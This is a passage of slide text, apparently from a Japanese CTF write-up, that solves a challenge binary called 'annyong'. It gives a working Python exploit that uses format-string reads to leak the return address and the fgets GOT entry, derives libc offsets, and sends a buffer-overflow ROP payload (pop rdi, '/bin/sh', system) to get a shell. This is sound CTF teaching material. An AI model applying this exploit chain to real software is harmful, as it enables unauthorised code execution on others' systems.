send_recv(s, "%265$pn") return_addr = int(r, 16) annyong_base_addr = return_addr - 0x1127 got_fgets_addr = annyong_base_addr + 0x202058 str_fgets_addr = "" s.send("%7$saaaa" + pack("<Q",got_fgets_addr) + "n") packed_addr = s.recv(1024).split("aaaa")[0] fgets_addr = unpack("<Q", packed_addr + "x00" * (8-len(packed_addr)))[0] lib_base = fgets_addr - 0x6efd0 system_r = lib_base + 0x45660 binsh_r = lib_base + 0x17a111 poprdi = lib_base + 0x229f2
22.
22 GOT アドレス fgetsは0x202058
23.
23 Return address offset
24.
24 Exploit [3/3] payload =
"A" * 0x810 + 'B' * 8 + p64(poprdi) + p64(binsh_r) + p64(system_r) r = send_recv(s, payload + "n") print "We got a shell:" interact(s) Pop rdi AAAAAAAA /bin/sh System関数 BBBBBBBB
25.
25 他のやり方で解いた方?
26.
お疲れ様でした! 26
Jetzt herunterladen